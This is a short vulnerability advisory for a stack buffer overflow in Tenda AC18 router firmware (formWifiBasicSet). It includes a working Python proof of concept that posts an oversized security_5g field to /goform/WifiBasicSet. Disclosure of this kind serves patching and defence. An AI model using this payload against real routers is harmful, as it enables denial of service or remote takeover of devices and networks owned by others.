CVE-2023-24166(CNVD-2023-21673)
Tenda AC18 Unauthorized stack overflow vulnerability
1. Affected version:
Tenda ac18_kf_V15.03.05.19(6318_)_cn
2. Firmware download address
https://www.tenda.com.cn/download/detail-2683.html
3. Vulnerability details
The function "formWifiBasicSet" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.
4. Recurring vulnerabilities and POC
import requests
from pwn import *
url = 'http://x.x.x.x/goform/WifiBasicSet'
pl = 'a'*564+p32(0xdeadbeef)
data = {'security_5g':pl, 'hideSsid':'1', 'ssid':'1', 'security':'1', 'wrlPwd':'1', 'hideSsid_5g':'1', 'ssid_5g':'1', 'wrlPwd_5g': '1'}
requests.post(url, data=data)5. Author
Drizzling_Sun @KRlab

